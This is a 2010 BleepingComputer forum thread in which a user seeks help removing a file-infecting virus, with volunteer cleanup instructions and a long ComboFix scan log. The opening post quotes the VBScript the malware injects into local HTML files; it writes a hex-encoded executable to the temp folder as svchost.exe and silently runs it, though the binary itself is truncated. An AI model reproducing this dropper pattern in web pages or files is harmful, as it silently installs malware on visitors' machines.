Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

svchost.exe script injection into local html files


  • This topic is locked This topic is locked
25 replies to this topic

#1 mikethecow

mikethecow

  • Members
  • 28 posts
  • OFFLINE
  •  
  • Local time:10:39 PM

Posted 28 July 2010 - 08:52 AM

Hi

I am unsure what is infecting my computer but it is adding the following script to all local html files whenever the computer restarts:

[codebox]&lt;script Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A...00"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>[/codebox]

I have run DDS and attached the log but I can only run GMER in safe mode; running normally I get a BSOD of 'bad pool header' type as soon as GMER starts running.

Sorry this is vague; I have run MalwareBytes, Super AntiSpyware, SpyBot Search & Destroy, Advanced System Protector and A Squared Free.

They all locate stuff which reappears every time the computer restarts. I ran all these programs after disconnecting to the internet.

Thanks in advance and I would really appreciate any light you could shed on this - I haven't been able to find anything through Google of this issue.

All the best

Mike

Attached Files



BC AdBot (Login to Remove)

 


#2 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:09:39 PM

Posted 07 August 2010 - 12:55 AM

Hi,

Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.
  • Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

  • Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

  • Please reply to this post so I know you are there.
The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.

Thanks thumbup2.gif
Posted Image
m0le is a proud member of UNITE

#3 mikethecow

mikethecow
  • Topic Starter

  • Members
  • 28 posts
  • OFFLINE
  •  
  • Local time:10:39 PM

Posted 07 August 2010 - 10:48 AM

Hi m0le!

Many thanks for getting back to me and I appreciate how busy you all are and that you are doing this for purely altruistic reasons ;)

I have been good, not posted to any other forums, waiting patiently for you good people to get back to me.

I am around so soon as you let me know what to do I can crack on with it.

Thanks again

Mike

#4 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:09:39 PM

Posted 07 August 2010 - 05:07 PM

Hi,

I'm not a programmer so I can't read the code. I believe we can deal with this without knowing what the code is, if not I will take advice.

Please download ComboFix from one of these locations:* IMPORTANT !!! Save ComboFix.exe to your Desktop making sure you rename it comfix.exe
  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Double click on Comfix.exe & follow the prompts.
  • As part of it's process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware.
  • Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console.
**Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue it's malware removal procedures.



Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message:



Click on Yes, to continue scanning for malware.

When finished, it shall produce a log for you. Please include the C:\ComboFix.txt in your next reply.
Posted Image
m0le is a proud member of UNITE

#5 mikethecow

mikethecow
  • Topic Starter

  • Members
  • 28 posts
  • OFFLINE
  •  
  • Local time:10:39 PM

Posted 07 August 2010 - 05:27 PM

Hi MOle

will go the ComboFix route now.

few things though:
  • In the weeks before posting to this forum I did run ComboFix - whether or not this was a good idea.
  • Anti Spyware progs said I had Ramnit, Rootkits...sorry never kept the logs so can't be any more specific.
  • Either my botched removal attempts or the malware has caused:
  1. Firefox to stop working - just get 'untitled' tabs
  2. All Adobe CS2 apps to stop working
  3. Zip / file compression programs to disappear
  4. All .html files to become inaccessible - if i rename them to '.html.php' I can open them and the malicious script is still intact(after I used software to remove it)

    Don't know if that helps at all - in the interests of full disclosure ;)

    Thanks

    Mike






#6 mikethecow

mikethecow
  • Topic Starter

  • Members
  • 28 posts
  • OFFLINE
  •  
  • Local time:10:39 PM

Posted 07 August 2010 - 06:00 PM

Hi M0le

Here's the ComboFix log:

[codebox]ComboFix 10-08-07.01 - Mike 07/08/2010 23:42:57.5.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.2.1252.44.1033.18.1015.553 [GMT 1:00]
Running from: e:\documents and settings\Mike\Desktop\ComFix.exe
FW: COMODO Firewall *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

e:\program files\Internet Explorer\complete.dat
e:\program files\Internet Explorer\dmlconf.dat
e:\program files\Microsoft\DesktopLayer.exe
e:\windows\system32\1.tmp

.
((((((((((((((((((((((((( Files Created from 2010-07-07 to 2010-08-07 )))))))))))))))))))))))))))))))
.

2010-08-01 11:06 . 2010-08-01 11:07 -------- d-----w- e:\documents and settings\Admin\Application Data\PSpad
2010-08-01 10:34 . 2010-08-01 10:34 -------- d--h--w- e:\windows\PIF
2010-07-30 06:46 . 2010-08-07 22:32 46080 ----a-w- e:\windows\ExplorerSrv.exe
2010-07-29 21:11 . 2010-07-29 21:11 -------- d-----w- e:\documents and settings\Admin\Application Data\Malwarebytes
2010-07-29 20:38 . 2010-07-29 20:38 -------- d-----w- e:\documents and settings\Admin\Application Data\Systweak
2010-07-29 09:11 . 2010-02-05 08:17 233136 ----a-w- e:\windows\system32\drivers\pctgntdi.sys
2010-07-29 09:10 . 2010-03-29 09:06 218592 ----a-w- e:\windows\system32\drivers\PCTCore.sys
2010-07-29 09:10 . 2009-11-23 12:54 88040 ----a-w- e:\windows\system32\drivers\PCTAppEvent.sys
2010-07-29 09:09 . 2010-08-07 22:33 -------- d-----w- e:\program files\Spyware Doctor
2010-07-29 09:09 . 2010-08-07 22:33 -------- d-----w- e:\program files\Common Files\PC Tools
2010-07-29 09:03 . 2010-07-29 21:37 -------- d-----w- e:\documents and settings\Admin\Microsoft
2010-07-28 20:16 . 2010-07-28 20:18 63488 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\SD10006.dll
2010-07-28 20:16 . 2010-07-28 20:18 117760 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\UIREPAIR.DLL
2010-07-28 20:16 . 2010-07-28 20:16 52224 ----a-w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SDDLLS\SD10005.dll
2010-07-28 20:12 . 2010-07-28 20:12 -------- d-----w- E:\VritualRoot
2010-07-28 20:11 . 2010-07-28 20:12 -------- d-----w- e:\documents and settings\All Users\Application Data\COMODO
2010-07-28 20:09 . 2010-07-28 20:09 -------- d-----w- e:\program files\COMODO
2010-07-28 20:02 . 2010-07-28 20:08 -------- d-----w- e:\documents and settings\All Users\Application Data\Comodo Downloader
2010-07-28 14:35 . 2010-07-28 14:35 -------- d-----w- e:\program files\ESET
2010-07-22 11:16 . 2010-07-22 11:16 -------- d-----w- E:\modules
2010-07-21 20:53 . 2010-07-28 17:25 -------- d-----w- e:\program files\riva
2010-07-21 20:52 . 2010-08-07 22:48 -------- d-----w- e:\program files\Microsoft
2010-07-15 21:04 . 2010-07-16 08:08 120 ----a-w- e:\documents and settings\Erin\Local Settings\Application Data\Szuyoc.dat
2010-07-15 21:04 . 2010-07-16 08:08 0 ----a-w- e:\documents and settings\Erin\Local Settings\Application Data\Oyavogikewejog.bin
2010-07-13 21:26 . 2010-07-23 13:38 0 ----a-w- e:\windows\Oyavogikewejog.bin
2010-07-13 21:26 . 2010-07-23 13:38 120 ----a-w- e:\windows\Szuyoc.dat

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-08-07 22:33 . 2010-06-15 10:25 -------- d---a-w- e:\documents and settings\All Users\Application Data\TEMP
2010-08-07 12:58 . 2010-02-06 23:45 -------- d-----w- e:\documents and settings\Mike\Application Data\vlc
2010-08-01 10:53 . 2010-02-01 22:06 23928 ----a-w- e:\documents and settings\Admin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-07-31 10:57 . 2010-02-02 09:06 -------- d-----w- e:\program files\Common Files\Adobe
2010-07-29 21:11 . 2010-05-04 20:03 -------- d-----w- e:\program files\Malwarebytes' Anti-Malware
2010-07-29 09:59 . 2010-07-29 10:06 6144 ------w- e:\windows\system32\2.tmp
2010-07-28 20:49 . 2010-05-04 20:10 -------- d-----w- e:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2010-07-28 17:24 . 2010-02-01 23:35 -------- d-----w- e:\program files\Opera
2010-07-28 15:18 . 2010-02-02 11:34 -------- d-----w- e:\program files\ZipGenius 6
2010-07-28 15:17 . 2010-06-10 12:27 -------- d-----w- e:\program files\SUPERAntiSpyware
2010-07-28 15:14 . 2010-02-01 23:55 -------- d-----w- e:\program files\QuickTime
2010-07-28 15:14 . 2010-02-02 10:19 -------- d-----w- e:\program files\PSPad editor
2010-07-28 15:14 . 2010-04-20 10:17 -------- d-----w- e:\program files\PC Connectivity Solution
2010-07-28 15:12 . 2010-05-13 09:34 -------- d-----w- e:\program files\Duplicate Cleaner
2010-07-28 15:11 . 2010-02-02 00:58 -------- d-----w- e:\program files\DAEMON Tools Lite
2010-07-28 15:11 . 2010-02-27 07:31 -------- d-----w- e:\program files\Common Files\DivX Shared
2010-07-28 15:09 . 2010-06-11 16:33 -------- d-----w- e:\program files\CCleaner
2010-07-28 15:09 . 2010-04-29 16:29 -------- d-----w- e:\program files\Audacity
2010-07-28 15:00 . 2010-06-13 16:14 -------- d-----w- e:\program files\a-squared HiJackFree
2010-07-28 14:59 . 2010-02-02 11:34 -------- d-----w- e:\program files\7-Zip
2010-07-26 09:40 . 2010-02-01 23:17 -------- d-----w- e:\program files\BitDefender
2010-07-26 09:33 . 2010-02-01 23:25 81984 ----a-w- e:\windows\system32\bdod.bin
2010-07-24 12:56 . 2010-02-11 13:14 -------- d-----w- e:\documents and settings\Mike\Application Data\uTorrent
2010-07-24 11:27 . 2010-02-02 10:57 -------- d-----w- e:\documents and settings\Mike\Application Data\FileZilla
2010-07-23 20:37 . 2010-06-13 16:14 -------- d-----w- e:\program files\a-squared Free
2010-07-23 17:37 . 2010-03-19 12:17 -------- d-----w- e:\documents and settings\Mike\Application Data\Aczy
2010-07-23 16:23 . 2010-04-25 07:45 -------- d-----w- e:\documents and settings\Mike\Application Data\Nuunn
2010-07-11 09:22 . 2010-05-29 15:34 -------- d-----w- e:\documents and settings\Erin\Application Data\vlc
2010-07-09 20:48 . 2010-04-06 23:07 -------- d-----w- e:\documents and settings\Erin\Application Data\uTorrent
2010-07-05 20:05 . 2010-02-02 09:36 23928 ----a-w- e:\documents and settings\Mike\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-06-26 13:39 . 2010-06-26 13:39 -------- d-----w- e:\documents and settings\Erin\Application Data\Systweak
2010-06-15 16:48 . 2010-06-15 16:44 43488992 ----a-w- e:\documents and settings\All Users\Application Data\Systweak\Advanced System Protector\Antispyware_Setup_6_15_2010.exe
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\documents and settings\Mike\Application Data\Systweak
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\documents and settings\All Users\Application Data\Systweak
2010-06-15 12:39 . 2010-06-15 12:39 -------- d-----w- e:\program files\Systweak
2010-06-15 11:43 . 2010-06-09 09:34 -------- d-----w- e:\program files\Common Files\Little Registry Cleaner
2010-06-15 11:43 . 2010-06-09 09:32 -------- d-----w- e:\program files\Little Registry Cleaner
2010-06-15 11:42 . 2010-06-15 10:59 -------- d-----w- e:\program files\Win 32.Trojan Downloader.Murlo Removal Tool
2010-06-15 09:29 . 2010-06-15 09:29 -------- dc-h--w- e:\documents and settings\All Users\Application Data\{74D08EB8-01D1-4BAE-91E3-F30C1B031AC6}
2010-06-13 16:13 . 2010-06-13 16:13 388096 ----a-r- e:\documents and settings\Mike\Application Data\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-06-13 16:13 . 2010-06-13 16:13 -------- d-----w- e:\program files\Trend Micro
2010-06-12 14:36 . 2010-06-12 14:36 -------- d-----w- e:\program files\Sophos
2010-06-12 01:31 . 2010-06-11 22:52 -------- d-----w- e:\program files\Windows Live Safety Center
2010-06-10 12:28 . 2010-06-10 12:28 -------- d-----w- e:\documents and settings\Mike\Application Data\SUPERAntiSpyware.com
2010-06-10 12:28 . 2010-06-10 12:28 -------- d-----w- e:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2010-06-10 11:03 . 2010-02-01 19:40 77423 ----a-w- e:\windows\pchealth\helpctr\OfflineCache\index.dat
2010-06-04 10:55 . 2010-06-04 10:55 229312 ----a-w- e:\windows\system32\drivers\cmdGuard.sys
2010-06-01 18:00 . 2010-06-01 18:00 278288 ----a-w- e:\windows\system32\guard32.dll
2010-06-01 18:00 . 2010-06-01 18:00 87824 ----a-w- e:\windows\system32\drivers\inspect.sys
2010-06-01 18:00 . 2010-06-01 18:00 25240 ----a-w- e:\windows\system32\drivers\cmdhlp.sys
2010-06-01 18:00 . 2010-06-01 18:00 15464 ----a-w- e:\windows\system32\drivers\cmderd.sys
2010-06-01 15:47 . 2010-04-08 08:19 19616 ----a-w- e:\documents and settings\Erin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2010-05-19 09:51 . 2010-05-19 09:51 4 ----a-w- e:\windows\system32\config\systemprofile\Application Data\ofubwi.dat
2010-05-17 14:20 . 2010-05-17 14:20 4 ----a-w- e:\documents and settings\Mike\Application Data\ofubwi.dat
.

((((((((((((((((((((((((((((( SnapShot@2010-07-26_13.35.37 )))))))))))))))))))))))))))))))))))))))))
.
- 2010-02-01 20:18 . 2010-07-24 07:54 32768 e:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
+ 2010-02-01 20:18 . 2010-07-28 20:11 32768 e:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
- 2010-02-01 20:18 . 2010-07-24 07:54 32768 e:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
+ 2010-02-01 20:18 . 2010-07-28 20:11 32768 e:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2010-02-01 20:18 . 2010-07-24 07:54 16384 e:\windows\system32\config\systemprofile\Cookies\index.dat
+ 2010-07-28 13:10 . 2010-07-28 20:11 16384 e:\windows\system32\config\systemprofile\Cookies\index.dat
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Distiller.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Distiller.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat_Standard.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat_Standard.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 25214 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_Acrobat.exe
+ 2010-02-02 09:13 . 2010-07-28 16:59 65536 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\PM_Designer.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 65536 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\PM_Designer.exe
+ 2009-12-21 19:09 . 2009-12-21 19:09 16832 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\ViewerPS.dll
+ 2009-12-22 00:57 . 2009-12-22 00:57 35760 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\reader_sl.exe
+ 2009-12-21 19:02 . 2009-12-21 19:02 79280 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\PDFPrevHndlr.dll
+ 2009-12-21 22:21 . 2009-12-21 22:21 99776 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\eula.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 70584 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\adobeextractfiles.dll
+ 2009-12-21 22:37 . 2009-12-21 22:37 27048 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrotextextractor.exe
+ 2009-12-21 17:39 . 2009-12-21 17:39 15288 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32Info.exe
+ 2009-12-21 17:27 . 2009-12-21 17:27 75200 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acroiehelpershim.dll
+ 2009-12-21 17:27 . 2009-12-21 17:27 61888 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroIEHelper.dll
+ 2010-02-02 09:13 . 2010-07-28 16:59 7278 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_ELEMENTS_DT.exe
- 2010-02-02 09:13 . 2010-02-02 09:13 7278 e:\windows\Installer\{AC76BA86-1033-0000-7760-000000000002}\SC_ELEMENTS_DT.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 326056 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\readerupdater.exe
+ 2009-12-21 17:35 . 2009-12-21 17:35 378264 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\pdfshell.dll
+ 2009-12-21 19:05 . 2009-12-21 19:05 116168 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\PDFPrevHndlrShim.exe
+ 2009-12-21 17:34 . 2009-12-21 17:34 103864 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\nppdf32.dll
+ 2009-11-09 18:18 . 2009-11-09 18:18 684032 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\JP2KLib.dll
+ 2009-12-21 19:02 . 2009-12-21 19:02 542168 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AdobeCollabSync.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 948672 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\adobearm.exe
+ 2009-12-21 17:43 . 2009-12-21 17:43 120240 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRdIF.dll
+ 2009-12-22 00:57 . 2009-12-22 00:57 349616 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32.exe
+ 2009-12-21 17:15 . 2009-12-21 17:15 660912 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroPDF.dll
+ 2009-12-21 18:32 . 2009-12-21 18:32 280024 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrobroker.exe
+ 2009-12-11 14:57 . 2009-12-11 14:57 326056 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\acrobatupdater.exe
+ 2009-12-21 18:15 . 2009-12-21 18:15 251296 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\a3dutility.exe
+ 2004-06-01 09:36 . 2004-06-01 09:36 214512 e:\windows\Installer\$PatchCache$\Managed\68AB67CA330100007706000000000020\7.0.0\icudt26l.dat
+ 2010-06-20 08:01 . 2010-06-20 08:01 8040960 e:\windows\Installer\90f09a.msp
+ 2010-07-31 10:58 . 2010-07-31 10:58 3940352 e:\windows\Installer\90f099.msi
+ 2010-07-28 16:26 . 2010-07-28 16:26 2647552 e:\windows\Installer\8f997b.msi
+ 2010-07-28 20:10 . 2010-07-28 20:10 3648000 e:\windows\Installer\571b0.msi
+ 2009-12-21 17:29 . 2009-12-21 17:29 2409880 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\rt3d.dll
+ 2009-12-21 18:00 . 2009-12-21 18:00 1298996 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\JSByteCodeWin.bin
+ 2009-12-21 22:31 . 2009-12-21 22:31 5713920 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AGM.dll
+ 2010-04-04 06:54 . 2010-04-04 06:54 11850240 e:\windows\Installer\90f09b.msp
+ 2009-12-21 22:21 . 2009-12-21 22:21 20436408 e:\windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0300000010\9.3.0\AcroRd32.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"COMODO Internet Security"="e:\program files\COMODO\COMODO Internet Security\cfp.exe" [2010-06-01 2039240]
"Adobe Reader Speed Launcher"="e:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-06-20 35760]
"Adobe ARM"="e:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-06-09 976832]
"Advanced System Protector"="e:\program files\Systweak\Advanced System Protector\ASP.exe" [2009-11-03 16347368]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="e:\windows\system32\CTFMON.EXE" [2004-08-04 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- e:\program files\SUPERAntiSpyware\SASWINLO.DLL

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=e:\windows\system32\guard32.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0sasnative32

[HKLM\~\startupfolder\E:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Acrobat Speed Launcher.lnk]
path=e:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Acrobat Speed Launcher.lnk
backup=e:\windows\pss\Adobe Acrobat Speed Launcher.lnkCommon Startup

[HKLM\~\startupfolder\E:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Gamma.lnk]
path=e:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Gamma.lnk
backup=e:\windows\pss\Adobe Gamma.lnkCommon Startup

[HKLM\~\startupfolder\E:^Documents and Settings^Mike^Start Menu^Programs^Startup^sisytj32.exe]
path=e:\documents and settings\Mike\Start Menu\Programs\Startup\sisytj32.exe
backup=e:\windows\pss\sisytj32.exeStartup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KernelFaultCheck]
e:\windows\system32\dumprep 0 -k [X]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Advanced System Protector]
2009-11-03 18:35 16347368 ----a-w- e:\program files\Systweak\Advanced System Protector\ASP.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AutoStartNPSAgent]
2009-08-14 14:48 106904 ----a-w- e:\program files\Samsung\Samsung New PC Studio\NPSAgent.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Broadcom Wireless Manager UI]
2006-11-01 12:48 1392640 ----a-w- e:\windows\system32\WLTRAY.EXE

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CTFMON.EXE]
2004-08-04 10:00 15360 ----a-w- e:\windows\system32\ctfmon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxhkcmd]
2006-06-06 17:06 77824 ----a-w- e:\windows\system32\hkcmd.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxpers]
2006-06-06 17:10 118784 ----a-w- e:\windows\system32\igfxpers.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxtray]
2006-06-06 17:09 94208 ----a-w- e:\windows\system32\igfxtray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2010-01-22 19:16 141608 ----a-w- e:\program files\iTunes\iTunesHelper.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Malwarebytes Anti-Malware (rootkit-scan)]
2010-04-29 14:39 1090952 ----a-w- e:\program files\Malwarebytes' Anti-Malware\mbam.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2004-08-04 01:06 1667584 ----a-w- e:\program files\Messenger\msmsgs.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SDFix]
2008-11-05 23:58 964661 ----a-w- e:\sdfix\RunThis.bat

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SigmatelSysTrayApp]
2007-05-10 10:22 405504 ----a-w- e:\program files\SigmaTel\C-Major Audio\WDM\stsystra.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2010-05-18 17:26 2397424 ----a-w- e:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2006-03-08 12:48 761947 ----a-w- e:\program files\Synaptics\SynTP\SynTPEnh.exe

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"ISTray"="e:\program files\Spyware Doctor\pctsTray.exe"

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"e:\\Program Files\\Opera\\opera.exe"=
"e:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"e:\\Program Files\\iTunes\\iTunes.exe"=
"e:\\Program Files\\uTorrent\\uTorrent.exe"=
"e:\\Program Files\\Veoh Networks\\VeohWebPlayer\\veohwebplayer.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"e:\\Program Files\\Samsung\\Samsung New PC Studio\\npsasvr.exe"=
"e:\\Program Files\\Samsung\\Samsung New PC Studio\\npsvsvr.exe"=

R0 PCTCore;PCTools KDS;e:\windows\system32\drivers\PCTCore.sys [29/07/2010 10:10 218592]
R1 cmdGuard;COMODO Internet Security Sandbox Driver;e:\windows\system32\drivers\cmdGuard.sys [04/06/2010 11:55 229312]
R1 cmdHlp;COMODO Internet Security Helper Driver;e:\windows\system32\drivers\cmdhlp.sys [01/06/2010 19:00 25240]
R1 SASDIFSV;SASDIFSV;e:\program files\SUPERAntiSpyware\sasdifsv.sys [17/02/2010 19:25 12872]
R1 SASKUTIL;SASKUTIL;e:\program files\SUPERAntiSpyware\SASKUTIL.SYS [10/05/2010 19:41 67656]
R2 a2free;a-squared Free Service;e:\program files\a-squared Free\a2service.exe [13/06/2010 17:14 1872320]
R2 FsUsbExService;FsUsbExService;e:\windows\system32\FsUsbExService.Exe [20/04/2010 11:18 237984]
R3 BCASPROT;Advanced System Protector;e:\program files\Systweak\Advanced System Protector\sasprot32.sys [15/06/2010 13:39 6656]
R3 FsUsbExDisk;FsUsbExDisk;e:\windows\system32\FsUsbExDisk.Sys [20/04/2010 11:18 36608]
S2 wscsvcSpooler;Security Center wscsvcSpooler;e:\windows\system32\adsldpca.exe srv --> e:\windows\system32\adsldpca.exe srv [?]
S3 aswArKrn;aswArKrn;\??\e:\docume~1\Mike\LOCALS~1\Temp\aswArKrn.sys --> e:\docume~1\Mike\LOCALS~1\Temp\aswArKrn.sys [?]
S3 MEMSWEEP2;MEMSWEEP2;\??\e:\windows\system32\8C.tmp --> e:\windows\system32\8C.tmp [?]
